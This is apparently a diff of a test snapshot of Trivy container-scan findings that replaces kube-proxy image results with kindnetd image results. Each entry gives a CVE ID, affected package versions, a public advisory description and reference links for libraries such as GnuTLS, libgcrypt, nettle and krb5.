"https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", + "value": "https://www.sqlite.org/src/info/90acdbfce9c08858", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "3.6.7-4+deb10u7", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-20232", - "installedVersion": "3.6.7-4+deb10u6", - "packageName": "libgnutls30", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-33560", + "installedVersion": "1.8.7-6", + "packageName": "libgcrypt20", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-20232", - "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", - "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", - "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", - "https://errata.almalinux.org/8/ALSA-2021-4451.html", - "https://errata.rockylinux.org/RLSA-2021:4451", - "https://gitlab.com/gnutls/gnutls/-/issues/1151", - "https://linux.oracle.com/cve/CVE-2021-20232.html", - "https://linux.oracle.com/errata/ELSA-2022-9221.html", - "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-20232", - "https://security.netapp.com/advisory/ntap-20210416-0005/", - "https://ubuntu.com/security/notices/USN-5029-1", - "https://www.cve.org/CVERecord?id=CVE-2021-20232", - "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", + "https://access.redhat.com/security/cve/CVE-2021-33560", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", + "https://dev.gnupg.org/T5305", + "https://dev.gnupg.org/T5328", + "https://dev.gnupg.org/T5466", + "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", + "https://eprint.iacr.org/2021/923", + "https://errata.almalinux.org/8/ALSA-2021-4409.html", + "https://linux.oracle.com/cve/CVE-2021-33560.html", + "https://linux.oracle.com/errata/ELSA-2022-9263.html", + "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", + "https://security.gentoo.org/glsa/202210-13", + "https://ubuntu.com/security/notices/USN-5080-1", + "https://ubuntu.com/security/notices/USN-5080-2", + "https://www.cve.org/CVERecord?id=CVE-2021-33560", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", ], }, "category": "Vulnerability", - "description": "A flaw was found in gnutls. A use after free issue in client_send_params in lib/ext/pre_shared_key.c may lead to memory corruption and other potential consequences.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "Libgcrypt before 1.8.8 and 1.9.x before 1.9.3 mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm, and the window size is not chosen appropriately. This, for example, affects use of ElGamal in OpenPGP.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "gnutls: Use after free in client_send_params in lib/ext/pre_shared_key.c", + "name": "libgcrypt: mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-20232", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-20232", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "value": "https://avd.aquasec.com/nvd/cve-2021-33560", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "value": "https://access.redhat.com/security/cve/CVE-2021-33560", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "value": "https://dev.gnupg.org/T5305", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "value": "https://dev.gnupg.org/T5328", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4451", + "value": "https://dev.gnupg.org/T5466", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/issues/1151", + "value": "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-20232.html", + "value": "https://eprint.iacr.org/2021/923", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "value": "https://errata.almalinux.org/8/ALSA-2021-4409.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", + "value": "https://linux.oracle.com/cve/CVE-2021-33560.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", + "value": "https://linux.oracle.com/errata/ELSA-2022-9263.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", + "value": "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", + "value": "https://security.gentoo.org/glsa/202210-13", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", + "value": "https://ubuntu.com/security/notices/USN-5080-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", + "value": "https://ubuntu.com/security/notices/USN-5080-2", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20232", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33560", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210416-0005/", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5029-1", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-20232", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, { "type": "URL", - "value": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "3.6.7-4+deb10u7", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-24659", - "installedVersion": "3.6.7-4+deb10u6", - "packageName": "libgnutls30", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-6829", + "installedVersion": "1.8.7-6", + "packageName": "libgcrypt20", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00054.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00060.html", - "https://access.redhat.com/security/cve/CVE-2020-24659", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24659", - "https://gitlab.com/gnutls/gnutls/-/issues/1071", - "https://linux.oracle.com/cve/CVE-2020-24659.html", - "https://linux.oracle.com/errata/ELSA-2020-5483.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/62BUAI4FQQLG6VTKRT7SUZPGJJ4NASQ3/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AWN56FDLQQXT2D2YHNI4TYH432TDMQ7N/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-24659", - "https://security.gentoo.org/glsa/202009-01", - "https://security.netapp.com/advisory/ntap-20200911-0006/", - "https://ubuntu.com/security/notices/USN-4491-1", - "https://usn.ubuntu.com/4491-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-24659", - "https://www.gnutls.org/security-new.html#GNUTLS-SA-2020-09-04", + "https://access.redhat.com/security/cve/CVE-2018-6829", + "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", + "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", + "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", + "https://www.cve.org/CVERecord?id=CVE-2018-6829", + "https://www.oracle.com/security-alerts/cpujan2020.html", ], }, "category": "Vulnerability", - "description": "An issue was discovered in GnuTLS before 3.6.15. A server can trigger a NULL pointer dereference in a TLS 1.3 client if a no_renegotiation alert is sent with unexpected timing, and then an invalid second handshake occurs. The crash happens in the application's error handling path, where the gnutls_deinit function is called after detecting a handshake failure.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "cipher/elgamal.c in Libgcrypt through 1.8.2, when used to encrypt messages directly, improperly encodes plaintexts, which allows attackers to obtain sensitive information by reading ciphertext data (i.e., it does not have semantic security in face of a ciphertext-only attack). The Decisional Diffie-Hellman (DDH) assumption does not hold for Libgcrypt's ElGamal implementation.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "gnutls: Heap buffer overflow in handshake with no_renegotiation alert sent", + "name": "libgcrypt: ElGamal implementation doesn't have semantic security due to incorrectly encoded plaintexts possibly allowing to obtain sensitive information", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-24659", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00054.html", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00060.html", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-24659", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24659", - }, - { - "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/issues/1071", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-24659.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-5483.html", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/62BUAI4FQQLG6VTKRT7SUZPGJJ4NASQ3/", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AWN56FDLQQXT2D2YHNI4TYH432TDMQ7N/", + "value": "https://avd.aquasec.com/nvd/cve-2018-6829", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-24659", + "value": "https://access.redhat.com/security/cve/CVE-2018-6829", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202009-01", + "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200911-0006/", + "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4491-1", + "value": "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4491-1/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-24659", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-6829", }, { "type": "URL", - "value": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2020-09-04", + "value": "https://www.oracle.com/security-alerts/cpujan2020.html", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "3.6.7-4+deb10u9", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "3.7.1-5+deb11u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2022-2509", - "installedVersion": "3.6.7-4+deb10u6", + "installedVersion": "3.7.1-5", "packageName": "libgnutls30", "references": [ "https://access.redhat.com/errata/RHSA-2022:6854", @@ -159114,7 +159465,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "A vulnerability found in gnutls. This security flaw happens because of a double free error occurs during verification of pkcs7 signatures in gnutls_pkcs7_verify function.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "Double free during gnutls_pkcs7_verify", "references": [ @@ -159211,10 +159562,10 @@ and the severity is therefore considered low.", }, { "attributes": { - "fixedVersion": "3.6.7-4+deb10u10", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "3.7.1-5+deb11u3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-0361", - "installedVersion": "3.6.7-4+deb10u6", + "installedVersion": "3.7.1-5", "packageName": "libgnutls30", "references": [ "https://access.redhat.com/errata/RHSA-2023:1141", @@ -159242,7 +159593,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "A timing side-channel in the handling of RSA ClientKeyExchange messages was discovered in GnuTLS. This side-channel can be sufficient to recover the key encrypted in the RSA ciphertext across a network in a Bleichenbacher style attack. To achieve a successful decryption the attacker would need to send a large amount of specially crafted messages to the vulnerable server. By recovering the secret from the ClientKeyExchange message, the attacker would be able to decrypt the application data exchanged over that connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "timing side-channel in the TLS RSA key exchange code", "references": [ @@ -159339,10 +159690,10 @@ and the severity is therefore considered low.", }, { "attributes": { - "fixedVersion": "3.6.7-4+deb10u9", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "3.7.1-5+deb11u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2021-4209", - "installedVersion": "3.6.7-4+deb10u6", + "installedVersion": "3.7.1-5", "packageName": "libgnutls30", "references": [ "https://access.redhat.com/security/cve/CVE-2021-4209", @@ -159360,7 +159711,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "A NULL pointer dereference flaw was found in GnuTLS. As Nettle's hash update functions internally call memcpy, providing zero-length input may cause undefined behavior. This flaw leads to a denial of service after authentication in rare circumstances.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "GnuTLS: Null pointer dereference in MD_UPDATE", "references": [ @@ -159418,9 +159769,9 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2011-3389", - "installedVersion": "3.6.7-4+deb10u6", + "installedVersion": "3.7.1-5", "packageName": "libgnutls30", "references": [ "http://arcticdog.wordpress.com/2012/08/29/beast-openssl-and-apache/", @@ -159524,7 +159875,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "HTTPS: block-wise chosen-plaintext attack against SSL/TLS (BEAST)", "references": [ @@ -159925,309 +160276,450 @@ and the severity is therefore considered low.", }, { "attributes": { - "fixedVersion": "3.4.1-1+deb10u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-20305", - "installedVersion": "3.4.1-1", - "packageName": "libhogweed4", + "fixedVersion": "1.18.3-6+deb11u3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libgssapi-krb5-2", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-20305", - "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", - "https://linux.oracle.com/cve/CVE-2021-20305.html", - "https://linux.oracle.com/errata/ELSA-2021-1206.html", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", - "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", - "https://security.gentoo.org/glsa/202105-31", - "https://security.netapp.com/advisory/ntap-20211022-0002/", - "https://ubuntu.com/security/notices/USN-4906-1", - "https://www.cve.org/CVERecord?id=CVE-2021-20305", - "https://www.debian.org/security/2021/dsa-4933", + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", ], }, "category": "Vulnerability", - "description": "A flaw was found in Nettle in versions before 3.7.2, where several Nettle signature verification functions (GOST DSA, EDDSA & ECDSA) result in the Elliptic Curve Cryptography point (ECC) multiply function being called with out-of-range scalers, possibly resulting in incorrect results. This flaw allows an attacker to force an invalid signature, causing an assertion failure or possible validation. The highest threat to this vulnerability is to confidentiality, integrity, as well as system availability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "nettle: Out of bounds memory access in signature verification", + "name": "integer overflow vulnerabilities in PAC parsing", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-20305", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-20305", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-20305.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-1206.html", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202105-31", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211022-0002/", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4906-1", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-20305", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4933", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5800-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5822-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5822-2", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5828-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5936-1", + }, + { + "type": "URL", + "value": "https://web.mit.edu/kerberos/advisories/", + }, + { + "type": "URL", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", + }, + { + "type": "URL", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + }, + { + "type": "URL", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "3.4.1-1+deb10u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3580", - "installedVersion": "3.4.1-1", - "packageName": "libhogweed4", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libgssapi-krb5-2", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-3580", - "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", - "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", - "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", - 